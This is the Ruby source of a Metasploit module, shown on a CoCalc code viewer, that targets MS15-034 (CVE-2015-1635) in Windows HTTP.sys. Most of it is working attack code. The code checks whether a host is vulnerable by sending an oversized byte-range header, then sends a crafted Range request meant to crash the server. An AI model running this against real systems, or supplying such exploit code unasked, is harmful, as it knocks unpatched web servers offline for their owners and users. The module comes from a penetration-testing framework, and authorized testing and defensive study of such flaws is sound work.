CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7

8
  # Watch out, dos all the things
9
  include Msf::Auxiliary::Scanner
10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Auxiliary::Dos
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',
16
      'Description'    => %q{
17
        This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a
18
        vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code
19
        execution. This module will try to cause a denial-of-service.
20
      },
21
      'Author'         =>
22
        [
23
          # Bill did all the work (see the pastebin code), twitter: @hectorh56193716
24
          'Bill Finlayson',
25
          # MSF. But really, these people made it happen:
26
          # https://github.com/rapid7/metasploit-framework/pull/5150
27
          'sinn3r'
28
        ],
29
      'References'     =>
30
        [
31
          ['CVE', '2015-1635'],
32
          ['MSB', 'MS15-034'],
33
          ['URL', 'https://pastebin.com/ypURDPc4'],
34
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],
35
          ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],
36
          ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']
37
        ],
38
      'License'        => MSF_LICENSE
39
    ))
40

41
    register_options(
42
      [
43
        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])
44
      ])
45
  end
46

47
  def upper_range
48
    0xFFFFFFFFFFFFFFFF
49
  end
50

51
  def run_host(ip)
52
    if check_host(ip) == Exploit::CheckCode::Vulnerable
53
      dos_host(ip)
54
    else
55
      print_status("Probably not vulnerable, will not dos it.")
56
    end
57
  end
58

59
  # Needed to allow the vulnerable uri to be shared between the #check and #dos
60
  def target_uri
61
    @target_uri ||= super
62
  end
63

64
  def get_file_size(ip)
65
    @file_size ||= lambda {
66
      file_size = -1
67
      uri = normalize_uri(target_uri.path)
68
      res = send_request_raw('uri' => uri)
69

70
      unless res
71
        vprint_error("Connection timed out")
72
        return file_size
73
      end
74

75
      if res.code == 404
76
        vprint_error("You got a 404. URI must be a valid resource.")
77
        return file_size
78
      end
79

80
      file_size = res.body.length
81
      vprint_status("File length: #{file_size} bytes")
82

83
      return file_size
84
    }.call
85
  end
86

87
  def dos_host(ip)
88
    file_size = get_file_size(ip)
89
    lower_range = file_size - 2
90

91
    # In here we have to use Rex because if we dos it, it causes our module to hang too
92
    uri = normalize_uri(target_uri.path)
93
    begin
94
      cli = Rex::Proto::Http::Client.new(ip)
95
      cli.connect
96
      req = cli.request_raw(
97
        'uri' => uri,
98
        'method' => 'GET',
99
        'headers' => {
100
          'Range' => "bytes=#{lower_range}-#{upper_range}"
101
        }
102
      )
103
      cli.send_request(req)
104
    rescue ::Errno::EPIPE, ::Timeout::Error
105
      # Same exceptions the HttpClient mixin catches
106
    end
107
    print_status("DOS request sent")
108
  end
109

110
  def potential_static_files_uris
111
    uri = normalize_uri(target_uri.path)
112

113
    return [uri] unless uri[-1, 1] == '/'
114

115
    uris = ["#{uri}welcome.png"]
116
    res  = send_request_raw('uri' => uri, 'method' => 'GET')
117

118
    return uris unless res
119

120
    site_uri = URI.parse(full_uri)
121
    page     = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))
122

123
    page.xpath('//link|//script|//style|//img').each do |tag|
124
      %w(href src).each do |attribute|
125
        attr_value = tag[attribute]
126

127
        next unless attr_value && !attr_value.empty?
128

129
        uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))
130

131
        next unless uri.host == vhost || uri.host == rhost
132

133
        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
134
      end
135
    end
136

137
    uris.uniq
138
  end
139

140
  def check_host(ip)
141
    potential_static_files_uris.each do |potential_uri|
142
      uri = normalize_uri(potential_uri)
143

144
      res = send_request_raw(
145
        'uri' => uri,
146
        'method' => 'GET',
147
        'headers' => {
148
          'Range' => "bytes=0-#{upper_range}"
149
        }
150
      )
151

152
      vmessage = "#{peer} - Checking #{uri}"
153

154
      if res && res.body.include?('Requested Range Not Satisfiable')
155
        vprint_status("#{vmessage} [#{res.code}] - Vulnerable")
156

157
        target_uri.path = uri # Needed for the DoS attack
158

159
        return Exploit::CheckCode::Vulnerable
160
      elsif res && res.body.include?('The request has an invalid header name')
161
        vprint_status("#{vmessage} [#{res.code}] - Safe")
162

163
        return Exploit::CheckCode::Safe
164
      else
165
        vprint_status("#{vmessage} - Unknown")
166
      end
167
    end
168

169
    Exploit::CheckCode::Unknown
170
  end
171
end
172

173